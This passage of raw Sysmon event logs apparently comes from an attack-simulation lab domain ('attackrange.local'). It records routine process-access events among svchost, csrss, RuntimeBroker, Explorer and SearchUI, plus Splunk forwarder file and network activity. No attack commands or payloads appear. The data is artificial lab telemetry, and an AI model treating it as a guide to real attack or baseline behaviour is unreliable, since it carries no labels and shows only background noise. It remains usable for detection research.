indows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 354300x80000000000000001048473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:35.602{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51015-false10.0.1.12-8000- 10341000x80000000000000001048472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.639{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.639{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.639{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.631{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.628{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.628{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F48F-60EB-267D-00000000CF01}2660C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+3dbed|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.622{466BC892-81EC-60E9-8133-00000000CF01}9348ATTACKRANGE\bobC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5AXA833U\microsoft.windows[1].xmlMD5=38F80956A64CF089AD0933427D7705C7,SHA256=E3D4765BBC78EF0C4B812AE494DF8E3C5B6A82DADBC3BB379387ED9CA10C1A20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.616{466BC892-81EC-60E9-8133-00000000CF01}9348ATTACKRANGE\bobC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet 
Explorer\DOMStore\5AXA833U\microsoft.windows[1].xmlMD5=C1DDEA3EF6BBEF3E7060A1A9AD89E4C5,SHA256=B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.612{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.612{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 23542300x80000000000000001048462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.415{466BC892-81EC-60E9-8133-00000000CF01}9348ATTACKRANGE\bobC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\5AXA833U\microsoft.windows[1].xmlMD5=A34545FAA044B15F00FD539895EE14A4,SHA256=630E6786C077CC7648703A36C5BAFF0B6F482BCBE57B85651028140417CE9B20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.344{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.344{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 
10341000x80000000000000001048454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:43.013{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001048527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.716{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D1D0CC30143925C23BD1220D37FC1A4,SHA256=07DDCF202B3E1173ABC51045BBC15F00BE02B46852AF00ED93326A75849DF24D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807484Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:44.196{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ADC3415BF60EF91D0FFB2E670440DB3,SHA256=A10B0548084E6C508AE21F307C77A664099C456F371B347195D2A3AF88E1953F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.701{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.701{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.685{466BC892-32D3-60E8-6F0B-00000000CF01}70767116C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+36f20|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+32f80|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+22534|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\SharedStartModel.dll+77f37|C:\Windows\System32\SharedStartModel.dll+b2d9d|C:\Windows\System32\SharedStartModel.dll+b2a24|C:\Windows\System32\SharedStartModel.dll+b2fab|C:\Windows\system32\windows.cortana.Desktop.dll+a274|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows
\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f 10341000x80000000000000001048523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
